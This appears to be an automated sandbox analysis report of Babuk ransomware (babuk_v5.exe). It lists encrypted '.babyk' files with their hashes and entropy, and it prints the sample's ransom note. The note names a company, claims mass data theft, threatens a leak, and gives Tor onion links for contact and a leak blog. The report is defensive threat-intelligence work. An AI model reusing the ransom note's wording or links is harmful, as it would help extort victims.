                                                                            Encrypted:false
                                                                            SSDEEP:24:5bZDsIpQT6gDSyeIF+EUiEoUXbmkAap0DWiAu/TLigtl2dR:5bZIOsDSxIelCkg5AOzl2D
                                                                            MD5:54249162E893C01AA7D06A6AA99330AB
                                                                            SHA1:A5F2227E56F053D9584A2C97D39BD1D745A8BBEB
                                                                            SHA-256:57BD1BD9190D7D54DEDFA4CB99364E413620040702A979CAFC568C7CCCCA1CE4
                                                                            SHA-512:53E29D38D4819AAF7FD9F7DB583A3EFEF7B687404330C3E91B75C3A3B5EAF8F71118300D4485E552E3CF7DF8734E8B3B4104B0FB84E19020374BB3666CA0F083
                                                                            Malicious:false
                                                                            Preview: C.{>........./T...k.....b..8.......S_.....i.DLh....|..tM..%M^.;..+.C>e......Xt..f.......V..i..F..B.,!..E.....=i.g<X.*..R.<.`A8%....G...JQm~i.\..'\.Wy=...e /.znJ0...g..........Qcr...5...%...,%..8 .#.'N:.8C.2..;.c.%..M.}....]..*....T...\.7....-3cU...Q..N...rw..dGA.9..Be>.Y..)..z...M.`.....G`..X..L.T.O.yK....8...Ve.... r.+X..;..p....|G.=..[.6...,.v.'.a.6. B.y(..2..w....W..0lh?].._.f...,pv.1\.....f..R..[|.0....-.,...SLR...wc..K...A...Z.|5>.X...W:...]..>5.2...8.....;...P.Jb.e;.....O5.(..L.i\....kK...x.R....!n..C.CR.X....].h.L..&.^.@}/H.%......1%H6..A...I.7a.l_...\.%...Z..zX.z....B......D..S..W...g..B.8.d...L.+. Ui...]..1.Om....*2.b`.....q.I..P....D..Cy.U.3..6...!...5....(..1....m..}..-.......w.R.o!{.1k..~t8...\..V ..1.B..T....C....~.o.4...W.....f.b..N.....3....b..'.c.d..z.9..'&..[..I=...X.z.. .X!....O.oN...W......YfwK.cN...W.+T4..j`..L.QEO..!........a.P.........G....g...tX...U..O...."i..x.h.X7.s...O...H.k...A...@l.1.....W...;..N.Q....9.......
                                                                            C:\Users\user\Downloads\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Downloads\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.83262760604983
                                                                            Encrypted:false
                                                                            SSDEEP:24:9XloC2OxE26ZmSW6o6vSW0TWqH5OG2/Rdsb09zoefhYdF:NKC2eEe8vSW0dH5uO68efhAF
                                                                            MD5:0CFDAC0737587444C3535ACAEFDF98F4
                                                                            SHA1:FC867757270C4EC10638C35B429DAF4FB3337790
                                                                            SHA-256:C0C7F6C96E818A2A0C796CF200A8F509DC1FAF282DFDDC459AC30507BE6303F6
                                                                            SHA-512:CDAF89754710E7F9A384AF88120A858C20AE9AA537A9C81C5B1942FE700E1130C6F9B4DC59D06200860BB73128EBA085969197346C50F91C515680EADE7FF2E0
                                                                            Malicious:false
                                                                            Preview: ....B...T....U.wp...G...%r.(O..c..q.h~.k..V..."..k...F...._..d....<.Z...Oe....;..E..YX d|..X..KX.*R4. 5...0.Z`v.]{...=gk.5...#;.....+G>..@DrO..=.8y(.B.E....9"T@..d.x......\xr.G.Z.Y.".1J.".t.T.C...3....D=lOq..]...v[g.>.....:.O.......eJL~r.o*u;...QVY"..I+O)..Mp..n.L.%.8.K..^.....T._-k......eP......CS..[..fxsC9...J.......d.Wu..eq...;..y..r.K.<p..#[La.k........]7.n.;..:.w../2dO.{.b6.z%p.hQ....-..z.!..^.2o$..&&jD.J..,..'...J.~?..>W`:.R.X3..s..MRxV.i!.:Pb...kZ}..j\.6.C...........M...0..6#.E...|...!qx..f..@.....5..=.2E.Y.....w.q.?.....{Y:..D...+K.3j....W.....E..hP.....7.zG.....E..+.?..aF.R.....l.%H.y^5.n...xo...;..B.Q.I.N...L.).s.Pv.Q....y3...zQn..|..zn..N.->7B...z...07.h..g.u.d..J..w...........h............&ic.....D..`;d.-.x.id..1`,.R...2....M......P..?4M0E.....l......!.@...8'..-..=.".'.s....... .3...t.)..O$...8F_...dBM6...2.+.....nYg.K$W...P..2.Fc.68.^....W\/..v.c....+..5.....DE..?.1X..>pnu..'[..TN~/Hob.#...Q..6._ZY..*........s'X.../*
                                                                            C:\Users\user\Downloads\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.802025673502048
                                                                            Encrypted:false
                                                                            SSDEEP:24:EXzRSnEPlm7gl4pBDUIBwD6mDAUFsTHfHMqOV7aab6Xmb1zMXzq:EXzRDlm7gl4p1UWwD6mDrsTHkqORb68N
                                                                            MD5:20C92FABFBA35C69CAFE02405D587385
                                                                            SHA1:8FECB8CCA58DBD2114B34D31812B005EE53E95C2
                                                                            SHA-256:629FCE5DC74E585BF32E05AFC9B40A776660E92F2317576E4DCDAAB51412BC03
                                                                            SHA-512:6726509D861B53B84EB03E996632A9CC425DB473AF43A550403E670FAFF01D8F2DB0162DDDED2843D94F5A0E9059051FE6CF91733DA4C7626EDEE832720CCFE5
                                                                            Malicious:false
                                                                            Preview: ..B.=.S.Z?........N....-.uDd&G.K.x.0)g......)Y.....F.....$..v2aF".[o6........M..Y..T..LDId.m.'?^[.7).X.....b....B.d".m1u.19S...~[.I....M7l..1.!f,pb..3.]!.w.|.V.X.t}...y.....(O..{./?..,.m6.I...6.s...&S?.~..I\.+h..f.iF.^|S..j.=a.....54...\2.')......Z....UnsU........A..7<.Q.P.K.......(...~.g..@.v.,./.5\Fz.h...f&H.3....(F.e.$L.g..?..G.>I.4b7~.>......,,....@.%.=.2L...;i...y.a..D.a..+x.-..w..1......}..(5.Ru.u.qQ......%#<3......`........3...g.....x...7.c..f....Qc...R.......ZH.t...I9...c._:...f...e.......S......)...jSuy...9....3..;...R.S....O..RE.JSyb..D..QJ......s.....X.E.....<..W.%!.....e.&../bac.B,5K...r.aW...e.%..f..._...v"?.5..,9Cd.....d...?3.-.!..4..q..d....w`..R..e.&]...V...()...{.r..r.!';.N.E.ej..#.k.Z...feZ'kP...^..c...s......!.On..kGv.C..D...,C......J;.B.a..........@J..G.Er.H.?.........>...m.._=.,...2.....b..GC..t9.........v.*.R.........UR.`6|.?..X.E..j..P.k.irFf....n...{_....._..X..>L.J`.......K..z"..........,U.....9@.F....oE!.`#.H.#
                                                                            C:\Users\user\Downloads\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.853113374933634
                                                                            Encrypted:false
                                                                            SSDEEP:24:XeW/M08W+EIjh5N3k6DlKARWuFV7J0Dvpsd10uRJC:T/MC+EIjLxDlRWmoDCdauy
                                                                            MD5:268A75DBD6CD927430178E55E1DDED70
                                                                            SHA1:BE4A060C3A1E4F9E9199C397613D3467249D5824
                                                                            SHA-256:476C1E703F8D7BBAD02946404C1FE4356F0B12C8A0F6C49B6280D7907920F510
                                                                            SHA-512:BE7ABEC89A6F95689774E786A2659076C801F7FA6CA87714C8F65BC98BC1BA6DFB9BFAC5869D9AD0B9F63F77A278D77908EBFADA2888C92956D6DEE1DF61A5BC
                                                                            Malicious:false
                                                                            Preview: .y`.......t.dH`8O.P$....".{.}Ma...:,[..Si.....r&. .c....O.Re..R.n.,....3...8c:.l:.>U. ...Gt..YdJ.l......._.].A...j"...O...r.Y.....vg..F.s)..17('.8.,.o.u.v..A..m.Eq..;.U...:.....(...j.,W.#D$...j.o..d0.B....q.].Z...U.q=...D....Epv#......%Z.&....wc|....(......7..o.a..W...M}u.oP..`..k..s.E..;S?...{.=.B...8[/.,..N.....=...Ib.P.&.A.N~..G...i.T.`|qz'....)...4..:..#,.d.oB..8e...T>.g...Q.S..|..RU....n.K.....J......}..... %8..6 ......].[.B...,G@.4...~.|..n..j..1C...}K.D...P@.U....-..Z...|...<6.^#.L...\..7..$w..z.........kX..Mb...$...?.....sX....u.i8..4.Z..F.t)..7c....]._`@u.....G...._*t..n.....3]...J.%.|r.p..k..2..."09f...Z...uY..'>.m..i%... +]...2@...T..Tx.j.....34...b1.h....D......^=w^.:/.Nho...&4..3..a...F.1Q..,f-.i...68..3v.C4\........s.)a.F..j..}F...n..6..,..O...M.`w"|y.B.......uEfz..t.U._.F...p...GWtS4.vl.vD.......7.<.....%.!..........#...2..;{x#.a..nK2.]..U4A.+.I.@.E.X....Z..#Jr....#..Ii.yG...b........v...;.G......5sr.]..Y...O..Z..*...d
                                                                            C:\Users\user\Downloads\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820685121702888
                                                                            Encrypted:false
                                                                            SSDEEP:24:/qN92AB2o7Lrw4xTD7g52InKPlLJSR1ccNQS8yF2hi4FiVkQn+:/a2AB33rw4xTHg52In193Fyi4Fi6Qn+
                                                                            MD5:97A5026AAB32E5B4C18270A90A97A2F6
                                                                            SHA1:A0A46AE213603DFFF9BA464D6879AE59E8CDB5B4
                                                                            SHA-256:22248BF4A369CA8E56FA217B349A8AFE2B0BEDB46C09E01DAB7C7394D21C2601
                                                                            SHA-512:5AB36F67C4B855FDBEF13204432AEAD716FE35DAF91F733216E310F69723BE8F49089762FC874CF2202E28CCD17A34B41D0E20E2CDFF5401EFBAFF16368709AF
                                                                            Malicious:false
                                                                            Preview: (...r.)..d..K;..}..!t.=..b.9...R.s..,......".a.{...A).<. ..(^C..m1.s...s......h(q8:..gIIo7.'...;f..5.....-..Dz..84y3.@v..n.".......j4...G..W.......... ....H0....]..S..".b.=$g..jL...Y.v.]m!....x...4.....;.En.Q....$.Ms7...U...t.+1.....9..2..V....9.!!.R.5R. ."..<.T)...i...LF.C9.T...u.}G.P...r*..k$uk...V.....P*6.....}T.uv....p......d..L$.VX.R.5[. ...^@.......R...s.....45."...Dk.qx.....k._ V...o-......y...:q.X'..+....2Z....>{..Z....o.M^e..-!.O...w.]..Y..IH3.l..u;].0..J*..E6....y..[H;.](...4...\>..p.+....?...bQ.@Q`..a..+.}..4...._.2.].....+.g.a...0]/....p...'..!@.%%:nq......j...2..&...B/.F.1.x......x..]..^k,+.@lY...n.a2...2....Y.J.MS.......r....U$Gt...7..W.Qy..M|N.;..uW...._.^CM%...t...N..y.M9Hq.S2....g..oU...<Qw..8.........2.C.....N5...e..vV..!.a.k...I.....JU.]DA...`..y.@".2<.....m...[..J.[..W.HW.of.1.p..!H....-.?.T..Gs.!.2.pW.,..Z...U..L.......,HxUF.........@;.....t..nY....q.........!K.F.ve*.[.....L...D0.F+.r..0cd!+5...Z....v...
                                                                            C:\Users\user\Downloads\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.815883683908296
                                                                            Encrypted:false
                                                                            SSDEEP:24:pow/0RIDheeb8u/p1pN1Y6mtUbpUELXiKVl0Yt/rx4Mvf72bdjuPg307JVL30vq1:pjDhN1p1pJpUEjiclthpfQwgEFdEvqya
                                                                            MD5:BDBEE584CDF9B8CA6357C8F919EEE97F
                                                                            SHA1:3711C85DAAE123F292FA2D2BE204ECE2989F21B7
                                                                            SHA-256:6CD6BFE26E182B35A83C321FC743587BE52E0C00B5EB8340F2AED0022FC29B2F
                                                                            SHA-512:030F113C6FF067F8C23F373E6107150BC6D81B658D0E146E644D9E4919B3A57673D763BD644B5F637914DCEDEEB11AB400959B4B66724CE715257642487838D8
                                                                            Malicious:false
                                                                            Preview: vG.c.n... .)nht..r9B..Jm.h...9h...).]6lB.{....4..g|...2B.F..7.S-.._]....~...33n~.vo.....!.(CWs.......~6...c....LYh....%P.[64..t.o........Y.....'F.d;.06..\.#3-o...xLE...h......X..e.O..Z*9....:p.1\.{...v...,..4...hE...$..`*T)1.G.*...k<y1PS.[.~Dz......7.6.......4.x..X.L..9......#.ES..s.g.p!X..........{F.R..$.....e..1....F*.?tx..|..,.H>-(@.\.=.h)........0$.4..;o..ochE}.H.P.(.X.......1..*..x.......IYX..."..V..[..j.."....c.w..q......o.."....)=.c..&..i.....q.o?...WY>z.>u\...=...S8B.A|....3.*2...g.m...X9>.5r....[.xr.....l.Nuv.J..c..5g.H.. ..x..P...|.:..Zu}*.v~.-.f....{..........E..pC]...eK.f.|.c..u.yG|..h.l.....n.l-....S4.l.=..A.s.......>.r@.........*C..9...*.u.h..\z..F....e..._sF.Ft......]./......S!....x.6-V.xm..b^+q...k)..R.X.6aJy5..$..z.9H......A..n..G.....J".$oc=.G.Q.a..&..AxQ.....j...&U...F........../=p.8Gs.)....4#.5..$.<R..D..f.........8....UK."x......B.m3R[.`_x\..L..L./.cW~c..7..0i....o4....+#>{,..3![e.Q.RHT....O..o......%.HZ
                                                                            C:\Users\user\Downloads\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.840476410131226
                                                                            Encrypted:false
                                                                            SSDEEP:24:r4BQcXUWwGGcdRyNz1Wpgt18hU2afdSDZM1i0GWModlo+b:sBQqQEdRNpgv8hUrdC2zG8dV
                                                                            MD5:E606EA630914024E44B07ED7C353FF3E
                                                                            SHA1:40D65102744C508D5654E83465753F54DD47D06C
                                                                            SHA-256:1ED369A1A67E2C4BAE1D1F6C700C15C33650F0A60ECF7ABFCC899FDD103967D9
                                                                            SHA-512:941473879F47EC6F55A8751E5A687E1E961A2D6DC3A3172C6393C11824FA4B986D0CCE82BF69A40755F4392A4687A4B2C4FF3A44DDA81F18FE485B768DDC972E
                                                                            Malicious:false
                                                                            Preview: .....G..Id.J.....?f......r$o...I.|e.sYaK.e.........C.b.&..0...SG1...U..8....1V..wR.D........v.7.q/20..WK(...P...S.Xu.._a.V?......F..O;\.&U..m5$....e... .R..m.t.....0I-.x$..j.SN........c.W.........3*.8.Q.....^#...u@...y.I....S$. ..L.G.aD).{...g..".`...d....t&.%..=|..e.Y]..]..b$..N..E%J...........a..[+.....>.'P....g?..#.,.)<...U.Q).s....}.f..?.%.]B..@*D.^.l...n7..`....^.~...o.s./..NW.-.XU....V.2..XI.+..|....(......B,"Y.Y..).7!8.].Y.j.8..6..f.{.;.R./.@....bh....1...h..>.L4.)......"...8.@..fRrCV3m.\N.n.'.........K..FD'v.;N.`Yy.h.g.........i..k.\..Vn..."..4|..!6.....#.....\..h.\.........y..+).s\..GH&......m).U.........j6..[M. .>.. .y:u....!....} ..L....B...&...,:.r9......n.c.B....3..=YJ.V.......Q04.?c......[%.G..Z......]p...V.f.#..[~....9....JZw.7_.}_..{.L..'V.s.....[`......Ea..........._..0..r3.....X..4T.N..E...u]7e......6`........_E....4. ...0Hm.=...0;8.P......`0K...<......,.."m.x%.l.nS..X...~W..b..]...8gy... x..?.VLD.#..-A
                                                                            C:\Users\user\Downloads\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.817679445542346
                                                                            Encrypted:false
                                                                            SSDEEP:24:WuIcwKoDxp692XCu6xcCj16ZzjXAKewOytOUtmBsliY8V1tVCgbqRN:W6wc92uuCx6ZzjXTOyVtOsliY8pQgbq7
                                                                            MD5:6AFD0B1B4DB4EACF6FFB930E3A69091F
                                                                            SHA1:1360B28624AE4452FFCFB7E1F2BFB1D9D6BF7013
                                                                            SHA-256:E05287858E84DCAB8642BCEBF6039B2032C3096DCBFDB5C2040153B7D4129E19
                                                                            SHA-512:B1701B10BB7B0705D736364EBE9C7F66971225D2D20F494911458BFE6AE326D0A9AD5F9614EAAB4347EEA893B187D42755358D7E2F08A95331966EE7C67E4B1D
                                                                            Malicious:false
                                                                            Preview: ;.}.......3...D.1.............N...H;=U..[.....foV..n.9.L.......w.]...5..7..PH.....`....y...`..3.>..h?0.p*.$.`.Q..ld...Z..k.JU..A.h........$..8.f}....7.,..@k..g..I.>..Ub..I.L.a.tY?o.4..9.?..^>*..}%.YY..xf...W.....i...../.%y. .5u.V....V.:.....E...$4=.4.3........O...'.o..........:....j."6.o..E~.zJ.<Z...<f....l.e..g...!...u..8++...........+...L...).]...ui|(.JA..Z..^q.d.D.U......S3d'. ...e.wbN..d...Y._.b.`V...Fh.....NE...|..z52..PL.nb...k3#...2..FPsXy.-!...|..Y56...'..2..3.*..j..KpL.Z....B......A...4Xg%.i..5`.{v.3..... =.0534..4...i..A...gF.5......^.....tH.%~.Cr..Y.A..v9'..?..i...:K..`W......../..]...92..X.!r.4..Y..WU.E....&..........qW{l.5..AD..g..].EL..lC........=.&.$..{'..@e 70.v.Q.An0...........1.}[.#.I)..Y1..X.Niw.1...iG.x5..Res..x.:.RnGQ9...C...H..^.}c.......XuH.p}gh.|@....jWhb.9.SB.\.l/V.G&..]....3..yz.o.}.^.=.?......,....>.J`..CQqL.PH5........7.....L..2....5T....<.A...u...*..7.n*ML2....9qT...gub.M*...Y}.)fO....5V..F$.F?#~G....
                                                                            C:\Users\user\Downloads\UOOJJOZIRH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.837521466830756
                                                                            Encrypted:false
                                                                            SSDEEP:24:5UuaZpR7OzWQ1hePQlimAAYLIAkyvGUugO/43/Wxdju2:5Uxphg/RM59kwGUugOk+f
                                                                            MD5:72424CEEBBA0028E074A807EB8315724
                                                                            SHA1:8A3B91C82470F3A53D008765CF87C0B5F1C25DF7
                                                                            SHA-256:7C7A0A4002FE8269DF53CF22354D85CA14CA26B64D15D24E0467A496D15DC3E1
                                                                            SHA-512:AD5DE2E28A2B39F8194B9D8D42B1E7D7A3CAAEE81E6E24C2DB68EA182A3C9BDE2156CDD617534DEC389C844362E8158DB5E2742D12A295DA203D30555D390D01
                                                                            Malicious:false
                                                                            Preview: K<g..x.......i...Ke...}xF.!.X..R...$.#..te...h.t..u.l..y.{.%.h 7...qzi.d.9Jc.32...~k......1.`.....C.0T2S0:q.^...zwj...f.q}."..z.........6*...._....:..7.,.DG2Ac.#r.^..d.u8...v.a...D..~Ak.z......W..=......en.V...../4..[.P.N.s6.}.i1|...v.j....d..T6.(V..#.J..2i 8.H....r>4'.3:.~H..>._..>.|.v....C...3.....tO..:.b~..B.t.....-.....MjL...g....j...e.U..,.../..E.S*.bh.Z.6...Z.m.YLm.fPJ,"4.....h0..D.iY......g;...n...8%.....e..'>.@J.s.J;.9Gx..o.Y.....:....S.._.R.,?f..rL4.."..F8o%yC%Q..:..D...'K0%.......3.l.h......P#.Xbd....^....?.@*.i..x.*.....$$T.A.....p/d./....f.>..J.r.x.NsN.....Bv!.....=.YAT...p...v....*(...o...,.em..u.m|]zVj.....S...>-.,N.....h.bo...4.E~..4.U.7......Ni.sE.....?...aE.|.).=v..R2............s.S..?...Z..kG..ZLQ....F.`'.h.EQ$.U..fh...$<Y..E.E.T.|.W.5...e.c..!....6gE1!Y..xr.w]....8.$3..b../*.9.z..+W..\.,^...]N.......u.e...705....L...4....V.H.gk=.j..<7..p"..GB.@..di.@'.dY(.(.}......K..0._Q.Ku..i.d.6...."..cnb......>..K....
                                                                            C:\Users\user\Downloads\VAMYDFPUND.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.805040346219205
                                                                            Encrypted:false
                                                                            SSDEEP:24:jTpCMPg54LR9P+3wismdavrvwBOxn/0lwOegf91f13jeGiMwXR5E7mT:jT4ViviRE/0lwOegdSBbT
                                                                            MD5:0675651C2735F33D6EC0EAB8A60BBDB1
                                                                            SHA1:33838C185AAC41FA247B6FEBF8D137B07C3FA52C
                                                                            SHA-256:22C36B8CBEBC2B435F4561C51D96806AC742A92FF3B9303B9C2A53608A59C13B
                                                                            SHA-512:972FC544112090F7EE5DEB40B866E43DDD14EAD132D1FB310E71C09BB272ADC71D7AF04B099DD7E873FEBB5525465B688F945931DA5CE4FFA9258416B103EC85
                                                                            Malicious:false
                                                                            Preview: ...c..9L5d.5.F4.:`.(...........Y.b1J.|.L;....B..F{.o-.cY..yD.c...}.kI..g.W.O6`:.tz.h."*Ob..[..h,..P.v1r....<.$to...A..'p[.%..K*.-|)@\.....?\.. QmM.9..7s..6!^..q....pK.C...u....C......|.e&?8.7...,a.i.3....|uQ.....)....R..lg.4J..t..F...KY.o..n....D.$.^FW..t...@......^~......q....<.._.q..)...e}..i.*...Ko.wvkK.)...E.5..+O.n....>..I6k..}.N....Q;..DD.............=.!b...o...W.5^z..;L...~.Y...%Y_.Y..d........T...........M.OF;.]w..D...@K....\..Xs.iE...U.P.Y.U4.w_@1...6.T.....hp7...O...Y...Y.Y^....Q...%..)..|........s...... v"0.e.4..mYtD,..;W{l...Y{s;..h->Y..L.{..H....U:..U..~.$..S......WO............rvK:.....l...5..;?.sl.x.@...X..++...C.3.Q^...g..l....(..4..q.....P&V.)..Y...a.R.8yz....W..B.n..[..%...3.;*...-.r|.....p|...Ir. .E.w.k.....r.[.{.=h....j..8.>(.v,..0.1A.h.....@....:.?...*.o.<.1..nM.:.j...^pw....<.a.$.W...Wt.dZ.P-.A....-[...+I...?.[d..O...5.LY..i.(V.M..........`...........w.g....W+.P[..Vd6..r...;.....+...RR.Xt...f. ...u..T..wT.V't
                                                                            C:\Users\user\Downloads\WKXEWIOTXI.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.809596568818312
                                                                            Encrypted:false
                                                                            SSDEEP:24:sP/CPsIivBF4Wg080wsztp5IcWRNYlABQenoOyTx7veUV:sHCHoBWwlz1m+yBZ9KNX
                                                                            MD5:62AD1A69009B72C393FF7988DABD526E
                                                                            SHA1:08870C2C3BB37BAB4A1C112F06C2E6723C6E05E0
                                                                            SHA-256:6431A9D3BECE074492EBF7A62C0DAA189AACDC7D36E02ADD27ECD20D62994945
                                                                            SHA-512:67A5EBCAADFEA11CCC4A5D5524D410A107D1B7C28FC62D4EA493334246A9896B917A23AF1C89B2DEA5C0013222BD87E3EB1186185C8E1C33C8F4E406A0779B8D
                                                                            Malicious:false
                                                                            Preview: vq.......J.....4.(S.e..ajq..e..)k...9\....AJ^.../...0.$bR.w....U.%. ~W#dK.{.j...d....!y.' .._?.WN.....'....wN!..*CG.-.>...>.l.S.{...g#..D!..R....9.J..e...l.3...-.<?...........S'..$...t.C.=....cL.."...%...[.'.....J2E\...2...0p..us3HX:eJ.Q..<.....w...j.....n......3et.V....fc:..*..._......2..J)...h7....[LS(..l.wk.......q$....X.....(~o\i@.U{B.ad..g%X=..Gn.#".....X..b...$....t.E.mMz.].L...A`..Q.....9{...v....J.4V.....+_j]8..kl'.u..5.R{....R*i..wB............E3:+....n..NZ.E...X.....s.>{.......t...x6.1..D..{..Z.....,tP..a.NO7K....bx.n..~A,I..@..y..R....0..{...9../.....OW..Z(....96......{..N.K.E..E..v0....L........v.jFS..kW.0..........{ r/I7r.vP.S'1.P..q......y.jl.WaU..6v...S{q..lEVf7..N..P.......yU.QL\a..$...E.,.}.qn.enc.Y.{l.K.6.......L.. .4U-OU2x..\...(X....^......I[.e>..G.p..H.a"...6.1*.l...9.-...u.(..M.:.,..u.2..^..x.@kz.|.N....W..I.. {...p5Ve.np:Z9..e....Bo..^._.O.]./.n.gSj\......p.....A`../G...0...b.e+..Q.8.....D.G.V>k......s..l.....C.;..*c...
                                                                            C:\Users\user\Downloads\ZBEDCJPBEY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.7959273420579365
                                                                            Encrypted:false
                                                                            SSDEEP:24:Ws5wVk39SC7QhTVSVaC8zvwbBZZvo6dcqgoN/3lY7pMhpUQoBFI0:Ws5WkNSQQ9VSIC8MbJoycqg7yroDI0
                                                                            MD5:885C7650CC588EFCB7CE715D684B3F23
                                                                            SHA1:4E00B0B2EB1264DA76564C30670E7165AFF0E9B6
                                                                            SHA-256:5206E842B9365336ABEE2EDAF5E13E5345D2D0233697BD6FE127E56804A4052A
                                                                            SHA-512:01424BCB42B34397E20902AE9AA4F0AF066B9A159ACDA9EC05A880342856AD1F8359434F98E96E19CFC81492F19543DF485C3737A8025F82D863D64FE6FE361F
                                                                            Malicious:false
                                                                            Preview: "Ot._.Wk%...P+..a..|.......A...Vmr.Vv.Pp.%._.).. .j.c"n.k2d.1$=.Z..M...>.ME.../:...:D.SJ....f..[(..n.(..J.j.W.u..E.`4[..0..1UI.x..;..t(STo.t...h..E...#ZD.9.^wz.i=J...."......Q.2.E.5...q.O(....;...>;.M(..H..}yB.o.....](..-.A,A/..1....c.Ae`..M ....^DMh..G.3|^.].........]...r...P.q..lS...*..$d..r...w......P.......cQ.....#..].:.n.vi&.........:.IT...`#t.!...4si.@.]3.."....F...P1;.@,T.M...x...&..D(..M.....H......0P......G.k..B...].......7......}..,'.!;ey.[...q#...y..Ua*.X^V4I.Q.`./.~z..6.."D.xk%...@..s.t....M+ ._.....)y...1.o...|;....\....zi....#fSJ..\7...j..."=E...>w.&..7..L.u_....H...;a..;.r^G.7^.-.].....x{U...}.L.sS...x]@.%...<....<T......#..i.h..~.....qn`q.......-h..Z.7..D;.|..#%Z....5..+..@8).....4..B..I..F.v..W.aB.O.v.R..I..u....(..*..g[w.Bc.X.G.B]_..$I..m...R..hp:6<D....~..oUiL.q..M..=t....U..Et3r...I.NL.}.E.X"......?y.>...2'....J......._$.a.k..X...zD.@`...?<....Znn1/...FE.......7.*...)G}.w,...-...v.r.].v.&sj..J......./....).^...^..
                                                                            C:\Users\user\Downloads\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8118167373755085
                                                                            Encrypted:false
                                                                            SSDEEP:24:NZw0IstMbf7EkPeWlWrI8mslNl47eTbUiVwo3Ro4rXdwQJ:NO0rMbf75diN2e/koK4rX+e
                                                                            MD5:ED0FE717504BDBFF5676197E148A9E10
                                                                            SHA1:823D89DA4331ACCDA99F0214E750C5158D2371C0
                                                                            SHA-256:51E99533585F513250E0BB2A3847EA0E860F3AD492306D01F46BC54A18753884
                                                                            SHA-512:054EF80A37B93F04EC1FB7F2DA2777CFC4365C2D673E97EEAA3EF0A3EBA7133E30DD4CDFBAF6F0C77A4416B6CF8E93E67B449DF3DCA0729C7190E76A71D32F76
                                                                            Malicious:false
